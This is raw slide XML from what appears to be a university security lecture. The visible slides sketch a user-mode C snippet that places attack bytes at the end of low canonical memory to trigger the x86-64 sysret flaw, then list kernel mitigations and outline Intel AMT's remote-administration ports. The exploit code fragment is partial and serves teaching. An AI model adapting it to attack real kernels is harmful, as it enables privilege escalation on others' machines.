                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    "\x0f\x05";                                // </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>syscall</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>size_t</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil_code_bytes</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = 19;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>// Copy the attack code to the very end of the</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>// low canonical region, so that the instruction</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>// *after* the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>syscall</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> will be a noncanonical</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>// address!</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uint8_t* </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>code_addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = page + </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>page_size</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> - </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil_code_bytes</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>memcpy</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>code_addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil_code</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil_code_bytes</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>// Execute the evil code.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>void (*</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil_func</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>)(void) = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil_code</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil_func</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>();</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{949E4AF9-C92D-4678-B371-57740DF18FA2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1803337" y="289334"/>
              <a:ext cx="8809912" cy="769441"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                  <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Example of Evil User-mode Code</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15372229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58333E-6 -3.7037E-7 L 0.00013 -0.51343 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="1500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-2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1895-3CDE-460F-B935-66DEB3D50075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="52303"/>
            <a:ext cx="10515600" cy="850064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Preventing the Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC5DD89C-8ED4-4F65-944D-EBA04758C1F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545431" y="791702"/>
            <a:ext cx="11365832" cy="5274596"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Disallow user code from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>ing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> the highest page in low canonical memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Ex: On Linux, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(0x7fff’ffff’f000, 4096, . . .)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> will return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ENOMEM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Ensure that the kernel validates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>rcx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> before executing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>sysret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Note that Intel’s documentation for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>sysret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> is very explicit about how </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>sysret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> may generate a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>#GP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E43C501-89B2-4CB8-A372-E1403A31D419}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="6091"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="575608" y="3758028"/>
            <a:ext cx="11040783" cy="3099972"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="415362549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D9BA-162A-43C8-A44E-3D7EAE152B72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="122872"/>
            <a:ext cx="12192000" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Intel’s Active Management Technology (AMT)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{787C53B3-A9AC-4253-9DAA-D8AD5F863394}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1177290"/>
            <a:ext cx="10515600" cy="5566410"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>AMT enables remote administration of a machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>The AMT software runs on the ME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Listens for HTTP requests on TCP port 16992</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Listens for HTTPS requests on TCP port 16993</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Using AMT, a remote administrator can do stuff like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Reboot/power down/power up a machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Enumerate local hardware resources (e.g., processors, IO devices)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Install packet filters to log/drop packets before the host OS can send/receive them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>AMT log data is stored in persistent on-ME memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Let’s hope that AMT’s login method is secure LOLOLOLOL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="397532438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BEDC0A-D5BF-44EB-AB91-48FD474FFED3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-7226"/>
            <a:ext cx="12192000" cy="6865226"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="240793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Related image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{326E5F2A-D07D-47C0-9569-1AB75D3C9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537" y="403052"/>
            <a:ext cx="9228221" cy="4614111"/>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40E07DD8-C65F-492E-B38F-A9199561F617}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-30077" y="-10425"/>
            <a:ext cx="3531272" cy="3078478"/>
            <a:chOff x="-30077" y="-10425"/>
            <a:chExt cx="3531272" cy="3078478"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="Group 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B993A28B-2471-46F0-96B9-E7C1530F2396}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-30077" y="-10425"/>
              <a:ext cx="3531272" cy="1048382"/>
              <a:chOff x="3645566" y="940076"/>
              <a:chExt cx="3994486" cy="1048382"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="TextBox 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52AFC27B-BF27-4008-9DCD-82FEED6CFA2D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3645567" y="940076"/>
                <a:ext cx="3994485" cy="584775"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>Obvious changes</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="TextBox 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBFA7671-5C78-4C94-B6FB-B123D351E41A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3645566" y="1403683"/>
                <a:ext cx="3994485" cy="584775"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>in </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>squintiness</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="15" name="Straight Arrow Connector 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A19C26E6-E4EF-4315-A166-E33C45615CE3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457199" y="3056021"/>
              <a:ext cx="733926"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6B58685-2EC5-458E-9B0C-99058F7F3D4E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="489283" y="1002632"/>
              <a:ext cx="0" cy="2065421"/>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B2E0E24F-A701-4D28-A9CB-040EE17594B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3904247" y="-10425"/>
            <a:ext cx="3994486" cy="2820510"/>
            <a:chOff x="3904247" y="-10425"/>
            <a:chExt cx="3994486" cy="2820510"/>
